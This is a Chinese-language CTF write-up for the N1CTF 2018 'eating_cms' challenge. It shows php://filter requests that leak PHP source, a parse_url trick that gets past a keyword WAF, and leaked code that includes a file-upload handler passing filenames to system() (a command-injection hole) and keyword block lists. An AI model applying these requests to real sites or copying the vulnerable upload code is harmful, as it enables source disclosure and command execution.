zoukankan      html  css  js  c++  java
  • [N1CTF 2018]eating_cms 敏感文件扫描+php伪协议利用

    写在前边

      又是失去梦想的一天,web狗日常失去动力。。。之前写了一篇文件包含的总结 https://www.cnblogs.com/Lee-404/p/12821986.html

      然后想起来之前做过一道文件包含的题没记录,就拿出来复现一下,在BUU上有环境

      base64解密网站   https://base64.supfree.net/

    解题

     

      发现是一个登录框,F12,robots.txt都没有有效的信息,想想有没有什么其他文件,用御剑扫一下发现了注册页面/register.php

       访问注册页面,随意注册一个用户登陆

     

     

       这里就要引起注意了,可能有文件包含漏洞存在,试一下PHP伪协议读取源码,再base64解码

    /user.php?page=php://filter/convert.base64-encode/resource=user
    <?php
    require_once("function.php");
    if( !isset( $_SESSION['user'] )){
        Header("Location: index.php");
    
    }
    if($_SESSION['isadmin'] === '1'){
        $oper_you_can_do = $OPERATE_admin;
    }else{
        $oper_you_can_do = $OPERATE;
    }
    //die($_SESSION['isadmin']);
    if($_SESSION['isadmin'] === '1'){
        if(!isset($_GET['page']) || $_GET['page'] === ''){
            $page = 'info';
        }else {
            $page = $_GET['page'];
        }
    }
    else{
        if(!isset($_GET['page'])|| $_GET['page'] === ''){
            $page = 'guest';
        }else {
            $page = $_GET['page'];
            if($page === 'info')
            {
    //            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
                Header("Location: user.php?page=guest");
            }
        }
    }
    filter_directory();
    //if(!in_array($page,$oper_you_can_do)){
    //    $page = 'info';
    //}
    include "$page.php";
    ?>

      盲目分析一波,是啥也没看出来,先这个文件包含了一个function.php,用同样的方法,再base64解密

    /user.php?page=php://filter/convert.base64-encode/resource=function
    <?php
    session_start();
    require_once "config.php";
    function Hacker()
    {
        Header("Location: hacker.php");
        die();
    }
    
    
    function filter_directory()
    {
        $keywords = ["flag","manage","ffffllllaaaaggg"];
        $uri = parse_url($_SERVER["REQUEST_URI"]);
        parse_str($uri['query'], $query);
    //    var_dump($query);
    //    die();
        foreach($keywords as $token)
        {
            foreach($query as $k => $v)
            {
                if (stristr($k, $token))
                    hacker();
                if (stristr($v, $token))
                    hacker();
            }
        }
    }
    
    function filter_directory_guest()
    {
        $keywords = ["flag","manage","ffffllllaaaaggg","info"];
        $uri = parse_url($_SERVER["REQUEST_URI"]);
        parse_str($uri['query'], $query);
    //    var_dump($query);
    //    die();
        foreach($keywords as $token)
        {
            foreach($query as $k => $v)
            {
                if (stristr($k, $token))
                    hacker();
                if (stristr($v, $token))
                    hacker();
            }
        }
    }
    
    function Filter($string)
    {
        global $mysqli;
        $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
        $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
        for ($i = 0; $i < strlen($string); $i++) {
            if (strpos("$whitelist", $string[$i]) === false) {
                Hacker();
            }
        }
        if (preg_match("/$blacklist/is", $string)) {
            Hacker();
        }
        if (is_string($string)) {
            return $mysqli->real_escape_string($string);
        } else {
            return "";
        }
    }
    
    function sql_query($sql_query)
    {
        global $mysqli;
        $res = $mysqli->query($sql_query);
        return $res;
    }
    
    function login($user, $pass)
    {
        $user = Filter($user);
        $pass = md5($pass);
        $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
        echo $sql;
        $res = sql_query($sql);
    //    var_dump($res);
    //    die();
        if ($res->num_rows) {
            $data = $res->fetch_array();
            $_SESSION['user'] = $data[username_which_you_do_not_know];
            $_SESSION['login'] = 1;
            $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
            return true;
        } else {
            return false;
        }
        return;
    }
    
    function updateadmin($level,$user)
    {
        $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
        echo $sql;
        $res = sql_query($sql);
    //    var_dump($res);
    //    die();
    //    die($res);
        if ($res == 1) {
            return true;
        } else {
            return false;
        }
        return;
    }
    
    function register($user, $pass)
    {
        global $mysqli;
        $user = Filter($user);
        $pass = md5($pass);
        $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
        $res = sql_query($sql);
        return $mysqli->insert_id;
    }
    
    function logout()
    {
        session_destroy();
        Header("Location: index.php");
    }
    
    ?>

      又是一波盲目分析,反正。。。没看出来啥,引入了一个config.php文件,有个ffffllllaaaaggg文件,尝试读源码

    /user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg

       被WAF了,再仔细审查一下源代码,发现有个parse_url函数,想到了parse_url解析漏洞  (https://www.cnblogs.com/Lee-404/p/12826352.html)

      playload:

    //user.php?page=php://filter/convert.base64-encode/resource=ffffllllaaaaggg
    <?php
    if (FLAG_SIG != 1){
        die("you can not visit it directly");
    }else {
        echo "you can find sth in m4aaannngggeee";
    }
    ?>

      有个提示,查看m4aaannngggeee

    /user.php?page=php://filter/convert.base64-encode/resource=m4aaannngggeee
    <?php
    if (FLAG_SIG != 1){
        die("you can not visit it directly");
    }
    include "templates/upload.html";
    
    ?>

      找到一个上传路径,访问看一下

       但是,这是个假的上传


       但是可以看到这里跳转到了upllloadddd.php,照之前的方法读取一下

    ///user.php?page=php://filter/read=convert.base64-encode/resource=upllloadddd
    <?php
    $allowtype = array("gif","png","jpg");
    $size = 10000000;
    $path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
    $filename = $_FILES['file']['name'];
    if(is_uploaded_file($_FILES['file']['tmp_name'])){
        if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
            die("error:can not move");
        }
    }else{
        die("error:not an upload file!");
    }
    $newfile = $path.$filename;
    echo "file upload success<br />";
    echo $filename;
    $picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
    echo "<img src='data:image/png;base64,".$picdata."'></img>";
    if($_FILES['file']['error']>0){
        unlink($newfile);
        die("Upload file error: ");
    }
    $ext = array_pop(explode(".",$_FILES['file']['name']));
    if(!in_array($ext,$allowtype)){
        unlink($newfile);
    }
    ?>

      发现

       没有啥防绕过这里可以命令注入,并且把内容打印出来

      实际上也得不到什么东西,线索断了,只能回去看看,歪打正着,访问m4aaannngggeee发现了真正的上传点

      上传文件,接下来抓包

  • 相关阅读:
    八 sizeof枚举
    九 推算程序结果
    十 交换变量特殊写法
    十一 移位-加减优先级 define undef
    十二 部分易忽略的优先级优先级
    十三 C语言的#特殊用法
    十四 访问数组:指针形式,下标形式
    VS出现未加载wntdll.pdb的解决办法
    C++继承产生的问题
    opencv加载图片imread失败的原因
  • 原文地址:https://www.cnblogs.com/Lee-404/p/12823617.html
Copyright © 2011-2022 走看看